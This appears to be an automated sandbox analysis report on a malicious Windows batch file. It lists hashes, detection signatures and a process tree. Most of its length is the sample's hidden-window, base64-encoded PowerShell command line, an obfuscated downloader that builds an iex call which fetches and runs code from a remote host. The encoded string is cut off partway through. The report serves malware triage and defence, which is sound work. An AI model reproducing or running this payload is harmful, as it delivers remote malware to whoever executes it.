Edit tour

Windows Analysis Report
malicious.bat

Overview

General Information

Sample name:malicious.bat
Analysis ID:1670572
MD5:693f86f667d508d9b9f3b8a00cdd1bb3
SHA1:127ab3dc1f6830d309db566178b36ccf05d46c6f
SHA256:59161a726bdcbab80697f632c77780d432cdaf0333eb9574172fd71a12a1c64e
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Sigma detected: Suspicious PowerShell Parameter Substring
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64native
  • cmd.exe (PID: 2900 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\malicious.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7232 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0AGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANgApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADgAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANgApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMANQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADgAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAYgApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAYQApACkAKwAoAGIARABYAHYAVgAoADAAeAA1AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANAAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADgAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQBiACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1AGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAYQApACkAKwAoAGIARABYAHYAVgAoADAAeAA0AGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADgAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzAGIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADMAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADgAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADgAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1AGIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAAzAGEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3AGIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBiACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANAApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGEAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwBkACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBiACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOQApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAGUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdg